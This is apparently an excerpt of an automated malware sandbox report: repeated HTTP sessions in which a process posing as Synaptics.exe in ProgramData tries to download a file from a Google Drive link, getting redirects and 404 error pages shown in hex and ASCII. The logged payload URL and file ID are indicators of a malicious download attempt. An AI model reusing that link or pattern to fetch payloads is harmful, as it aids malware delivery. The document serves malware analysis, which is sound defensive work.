                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 6b 56 55 70 30 72 54 56 79 38 62 68 2d 66 38 64 6f 6f 32 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="nkVUp0rTVy8bh-f8doo2nw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.849740216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:26 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-z6hRVHrrpnnCOOVawROjhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.849739216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:26 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-EP6FK7GSEWflgNLk0qU3XQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.849744172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:27 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:27 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5QsWSPFT7-ai2Lw8XcgiylFdkg7Ps7VmTZLwocS-NCUR3fOxBYmn4y1wyAnFemT_X_
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:27 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-fcsdbU19w55fbotYIYA5ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:27 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:27 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 69 62 75 57 5f 68 6b 49 31 37 48 4a 70 43 43 58 59 74 77 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="oibuW_hkI17HJpCCXYtwKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:27 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.849747216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:27 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:27 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-RzpQ0Ffvikx_ZM30DTBNTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.849745216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:27 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:27 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-llOh5iMOy_73fbj3Nay8Gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.849746172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:27 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:27 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6I5LGRmxxBcb7aYkVcEiGT5uDazQlk-Qq4tMReKqVC1LnDYVsSfdILU_vwfQykDLIYhNB3Qfg
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:27 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-O1rmXFS9PWgDEYk2PmgXQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:27 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:25:27 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 36 4c 7a 57 65 35 4f 4a 79 44 7a 64 55 42 52 43 4a 68 47 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="R6LzWe5OJyDzdUBRCJhGlw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:27 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              20192.168.2.849751216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-6DLupfvH0ebPrIg1Hb3Yrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              21192.168.2.849750216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-tZyAl7mdv1gdWOoa5pn0sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              22192.168.2.849752172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC75Sb2YdE01qEoYtK-CGmnrtJ5ZypjeEIaAX5oTTwQ5w1htS722y4P4LVM_DCXq4L71fgwo4D4
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lXMAAz3TH2MTVRPmI9OivA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
